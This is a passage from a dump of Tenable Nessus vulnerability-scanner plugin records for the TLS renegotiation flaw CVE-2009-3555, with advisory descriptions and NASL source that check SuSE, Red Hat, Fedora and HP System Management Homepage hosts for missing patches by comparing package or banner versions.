script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"gnutls-2.4.1-26.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libgnutls-devel-2.4.1-26.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libgnutls-extra-devel-2.4.1-26.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libgnutls-extra26-2.4.1-26.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libgnutls26-2.4.1-26.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.4.1-26.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-04-01T03:30:10", "description": "According to the web server banner, the version of HP System\nManagement Homepage (SMH) running on the remote host is potentially\naffected by the following vulnerabilities :\n\n - Session renegotiations are not handled properly, which\n could be exploited to insert arbitrary plaintext by a\n man-in-the-middle. (CVE-2009-3555)\n\n - An unspecified vulnerability in version 2.0.18 of the\n Namazu component, used by the Windows version of SMH.", "edition": 28, "published": "2010-05-19T00:00:00", "title": "HP System Management Homepage < 6.1.0.102 / 6.1.0-103 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:hp:system_management_homepage"], "id": "HPSMH_6_1_0_102.NASL", "href": "https://www.tenable.com/plugins/nessus/46677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(46677);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n script_xref(name:\"Secunia\", value:\"39777\");\n\n script_name(english:\"HP System Management Homepage < 6.1.0.102 / 6.1.0-103 Multiple Vulnerabilities\");\n script_summary(english:\"Does a banner check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web server has multiple vulnerabilities.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to the web server banner, the version of HP System\nManagement Homepage (SMH) running on the remote host is potentially\naffected by the following vulnerabilities :\n\n - Session renegotiations are not handled properly, which\n could be exploited to insert arbitrary plaintext by a\n man-in-the-middle. (CVE-2009-3555)\n\n - An unspecified vulnerability in version 2.0.18 of the\n Namazu component, used by the Windows version of SMH.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2010/May/139\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e8707ba\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to HP System Management Homepage 6.1.0.102 (Windows) /\n6.1.0-103 (Linux) or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:system_management_homepage\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"compaq_wbem_detect.nasl\");\n script_require_keys(\"www/hp_smh\");\n script_require_ports(\"Services/www\", 2301, 2381);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:2381, embedded:TRUE);\n\n\ninstall = get_install_from_kb(appname:'hp_smh', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nversion = install['ver'];\nprod = get_kb_item_or_exit(\"www/\"+port+\"/hp_smh/variant\");\nif (version == UNKNOWN_VER)\n exit(1, 'The version of '+prod+' installed at '+build_url(port:port, qs:dir+\"/\")+' is unknown.');\n\n# nb: 'version' can have non-numeric characters in it so we'll create\n# an alternate form and make sure that's safe for use in 'ver_compare()'.\nversion_alt = ereg_replace(pattern:\"[_-]\", replace:\".\", string:version);\nif (!ereg(pattern:\"^[0-9][0-9.]+$\", string:version_alt))\n exit(1, 'The version of '+prod+' installed at '+build_url(port:port, qs:dir+\"/\")+' does not look valid ('+version+').');\n\n# technically 6.1.0.103 is the fix for Linux and 6.1.0.102 is the fix for\n# Windows, but there is no way to infer OS from the banner. since there\n# is no 6.1.0.102 publicly released for Linux, this check should be\n# Good Enough\nfixed_version = '6.1.0.102';\nif (ver_compare(ver:version_alt, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n source_line = get_kb_item(\"www/\"+port+\"/hp_smh/source\");\n\n report = '\\n Product : ' + prod;\n if (!isnull(source_line))\n report += '\\n Version source : ' + source_line;\n report +=\n '\\n Installed version : ' + version +\n '\\n Fixed version : 6.1.0.102 (Windows) / 6.1.0-103 (Linux)\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n\n exit(0);\n}\nelse exit(0, prod+\" \"+version+\" is listening on port \"+port+\" and is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:14:52", "description": "The SSL-renegotiation 'authentication gap' has been fixed in GnuTLS.\n(CVE-2009-3555)", "edition": 22, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : GnuTLS (ZYPP Patch Number 7299)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_GNUTLS-7299.NASL", "href": "https://www.tenable.com/plugins/nessus/51748", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51748);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE 10 Security Update : GnuTLS (ZYPP Patch Number 7299)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SSL-renegotiation 'authentication gap' has been fixed in GnuTLS.\n(CVE-2009-3555)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7299.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"gnutls-1.2.10-13.26.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"gnutls-devel-1.2.10-13.26.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"gnutls-32bit-1.2.10-13.26.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"gnutls-devel-32bit-1.2.10-13.26.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"gnutls-1.2.10-13.26.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"gnutls-devel-1.2.10-13.26.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"gnutls-32bit-1.2.10-13.26.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"gnutls-devel-32bit-1.2.10-13.26.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:02:26", "description": "The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate data to a renegotiated connection. This\nallowed man-in-the-middle attackers to inject HTTP requests in a HTTPS\nsession without being noticed. For example Apache's mod_ssl was\nvulnerable to this kind of attack because it uses openssl. Please note\nthat renegotiation will be disabled by this update and may cause\nproblems in some cases. (CVE-2009-3555: CVSS v2 Base Score: 6.4)", "edition": 24, "published": "2009-11-18T00:00:00", "title": "SuSE9 Security Update : OpenSSL (YOU Patch Number 12550)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2009-11-18T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12550.NASL", "href": "https://www.tenable.com/plugins/nessus/42836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42836);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE9 Security Update : OpenSSL (YOU Patch Number 12550)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate data to a renegotiated connection. This\nallowed man-in-the-middle attackers to inject HTTP requests in a HTTPS\nsession without being noticed. For example Apache's mod_ssl was\nvulnerable to this kind of attack because it uses openssl. Please note\nthat renegotiation will be disabled by this update and may cause\nproblems in some cases. (CVE-2009-3555: CVSS v2 Base Score: 6.4)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12550.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"openssl-0.9.7d-15.41\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"openssl-devel-0.9.7d-15.41\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"openssl-doc-0.9.7d-15.41\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"openssl-32bit-9-200911130943\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"openssl-devel-32bit-9-200911130943\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T13:07:34", "description": "Updated nss packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nNetwork Security Services (NSS) is a set of libraries designed to\nsupport the cross-platform development of security-enabled client and\nserver applications. Applications built with NSS can support SSLv2,\nSSLv3, TLS, and other security standards.\n\nNetscape Portable Runtime (NSPR) provides platform independence for\nnon-GUI operating system facilities. These facilities include threads,\nthread synchronization, normal file and network I/O, interval timing,\ncalendar time, basic memory management (malloc and free), and shared\nlibrary linking.\n\nA flaw was found in the way the TLS/SSL (Transport Layer\nSecurity/Secure Sockets Layer) protocols handled session\nrenegotiation. A man-in-the-middle attacker could use this flaw to\nprefix arbitrary plain text to a client's session (for example, an\nHTTPS connection to a website). This could force the server to process\nan attacker's request as if authenticated using the victim's\ncredentials. This update addresses this flaw by implementing the TLS\nRenegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details\nabout this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nUsers of Red Hat Certificate System 7.3 and 8.0 should review the\nfollowing Knowledgebase article before installing this update:\nhttp://kbase.redhat.com/faq/docs/DOC-28439\n\nAll users of NSS are advised to upgrade to these updated packages,\nwhich update NSS to version 3.12.6. This erratum also updates the NSPR\npackages to the version required by NSS 3.12.6. All running\napplications using the NSS library must be restarted for this update\nto take effect.", "edition": 29, "published": "2010-05-11T00:00:00", "title": "RHEL 4 / 5 : nss (RHSA-2010:0165)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2010-05-11T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:nss-devel", "p-cpe:/a:redhat:enterprise_linux:nss-pkcs11-devel", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:nss-tools", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:nspr", "p-cpe:/a:redhat:enterprise_linux:nss", "p-cpe:/a:redhat:enterprise_linux:nspr-devel"], "id": "REDHAT-RHSA-2010-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/46276", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0165. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46276);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_xref(name:\"RHSA\", value:\"2010:0165\");\n\n script_name(english:\"RHEL 4 / 5 : nss (RHSA-2010:0165)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated nss packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nNetwork Security Services (NSS) is a set of libraries designed to\nsupport the cross-platform development of security-enabled client and\nserver applications. Applications built with NSS can support SSLv2,\nSSLv3, TLS, and other security standards.\n\nNetscape Portable Runtime (NSPR) provides platform independence for\nnon-GUI operating system facilities. These facilities include threads,\nthread synchronization, normal file and network I/O, interval timing,\ncalendar time, basic memory management (malloc and free), and shared\nlibrary linking.\n\nA flaw was found in the way the TLS/SSL (Transport Layer\nSecurity/Secure Sockets Layer) protocols handled session\nrenegotiation. A man-in-the-middle attacker could use this flaw to\nprefix arbitrary plain text to a client's session (for example, an\nHTTPS connection to a website). This could force the server to process\nan attacker's request as if authenticated using the victim's\ncredentials. This update addresses this flaw by implementing the TLS\nRenegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details\nabout this flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nUsers of Red Hat Certificate System 7.3 and 8.0 should review the\nfollowing Knowledgebase article before installing this update:\nhttp://kbase.redhat.com/faq/docs/DOC-28439\n\nAll users of NSS are advised to upgrade to these updated packages,\nwhich update NSS to version 3.12.6. This erratum also updates the NSPR\npackages to the version required by NSS 3.12.6. All running\napplications using the NSS library must be restarted for this update\nto take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3555\"\n );\n # http://kbase.redhat.com/faq/docs/DOC-20491\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/20490\"\n );\n # http://kbase.redhat.com/faq/docs/DOC-28439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/23543\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0165\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nss-pkcs11-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0165\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"nspr-4.8.4-1.1.el4_8\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"nspr-devel-4.8.4-1.1.el4_8\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"nss-3.12.6-1.el4_8\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"nss-devel-3.12.6-1.el4_8\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"nss-tools-3.12.6-1.el4_8\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"nspr-4.8.4-1.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"nspr-devel-4.8.4-1.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"nss-3.12.6-1.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"nss-devel-3.12.6-1.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"nss-pkcs11-devel-3.12.6-1.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nss-tools-3.12.6-1.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nss-tools-3.12.6-1.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nss-tools-3.12.6-1.el5_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nspr / nspr-devel / nss / nss-devel / nss-pkcs11-devel / nss-tools\");\n }\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:07:02", "description": "Update to 3.12.5 This update fixes the following security flaw:\nCVE-2009-3555 TLS: MITM attacks via session renegotiation\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2009-12-10T00:00:00", "title": "Fedora 12 : nss-util-3.12.5-1.fc12.1 (2009-12968)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-10T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:nss-util", "cpe:/o:fedoraproject:fedora:12"], "id": "FEDORA_2009-12968.NASL", "href": "https://www.tenable.com/plugins/nessus/43092", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12968.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43092);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n script_xref(name:\"FEDORA\", value:\"2009-12968\");\n\n script_name(english:\"Fedora 12 : nss-util-3.12.5-1.fc12.1 (2009-12968)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 3.12.5 This update fixes the following security flaw:\nCVE-2009-3555 TLS: MITM attacks via session renegotiation\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=533125\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/032443.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?33249dce\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected nss-util package.\"\n );\n 